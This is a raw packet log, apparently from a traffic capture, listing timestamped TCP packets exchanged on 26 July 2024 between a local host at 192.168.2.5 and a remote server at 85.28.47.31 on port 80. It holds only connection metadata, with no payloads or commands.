Jul 26, 2024 20:09:04.166357994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.166389942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.166419029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.166424036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.166435003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.166472912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.167047977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.167081118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.167108059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.167114973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.167123079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.167177916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.167819977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.167853117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.167881966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.167907000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.168307066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.168365002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.168603897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.168634892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.168664932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.168668985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.168679953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.168713093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.169456005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.169511080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.170094013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.170126915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.170156956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.170161009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.170171976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.170201063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.170989990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171025038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171052933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171056986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171068907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171164036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171808004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171844959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171875000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171879053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171890020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171911001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.171921015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.171962023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.172665119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.172699928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.172728062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.172732115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.172744036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.172772884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.173382044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.173414946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.173443079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.173449993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.173458099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.173482895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.173491955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.173526049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.174300909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.174335003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.174364090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.174366951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.174379110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.174401045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.174410105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.174432039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.174443007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.174479961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.175230980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.175266981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.175295115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.175299883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.175309896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.175333023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.175343990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.175374985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.176143885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.176177979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.176208019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.176212072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.176223993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.176255941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.176955938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177076101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177114964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177114964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177202940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177237034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177270889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177290916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177838087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177870989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177903891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177912951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177912951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177937031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.177948952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.177979946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.178697109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.178730011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.178759098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.178764105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.178774118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.178797960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.178807974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.178829908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.178841114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.178877115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179511070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179543972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179574013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179575920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179589033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179609060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179619074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179641962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179658890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179673910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.179683924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.179718971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.191730022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.191782951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.191816092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.191816092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.191843033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.191857100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192146063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192178011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192205906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192213058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192223072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192245960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192255020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192378998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192754984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192786932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192820072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.192825079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192852974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.192889929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.193124056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.193156004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.193178892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.193188906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.193200111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.193236113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.229403973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229502916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229506969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.229518890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229546070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.229563951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.229926109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229942083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229959011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229974985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.229979038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.229991913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.230001926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.230045080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.230592012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.230607986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.230637074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.230664015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.239999056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240015984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240031958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240047932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240051985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240076065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240097046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240636110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240674019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240681887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240689993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240705013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240720987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.240716934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240731001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240746021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.240756989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.241508961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.241525888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.241540909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.241556883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.241556883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.241574049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.241591930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.242440939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.242456913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.242471933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.242486000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.242510080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.245222092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.245266914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.245317936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.245333910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.245362043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.245376110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.245590925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.245608091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.245635033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.245651007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.259068012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259085894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259099960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259119987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.259155035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.259155035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.259922028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259938955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259954929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259969950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259973049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.259985924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.259996891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.260034084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.260786057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260802984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260818005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260833979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260843039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.260848999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260858059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.260864973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.260888100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.260900021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262408972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262424946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262439966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262454987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262459040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262469053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262476921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262492895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262495041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262512922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262537003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262566090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262582064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262597084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262609005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262613058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262625933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262628078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.262645960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.262691975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.263386011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.263402939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.263417959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.263436079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.263439894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.263454914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.263464928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.263487101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.263509989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.264240026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.264292955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.265486956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265503883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265520096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265530109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.265536070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265546083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.265551090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265568972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.265575886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.265598059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.265645027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266156912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266172886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266187906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266202927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266206980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266217947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266217947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266235113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266239882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266258001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266275883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.266951084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266968012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266983032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.266999006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267002106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.267014027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267021894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.267031908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267044067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.267075062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.267771006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267786980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267802000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.267821074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.267843008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.268630028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.268646955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.268673897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.268699884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.269638062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.269663095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.269679070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.269690037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.269695044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.269707918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.269723892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.269741058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270005941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270024061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270039082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270056009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270066023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270082951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270689964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270706892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270721912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270736933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.270746946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270752907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270787001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.270787001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.271543980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.271560907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.271593094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.271616936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.272452116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.272494078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.272507906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.272528887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.292475939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.292552948 CEST	49704	80	192.168.2.5	85.28.47.31
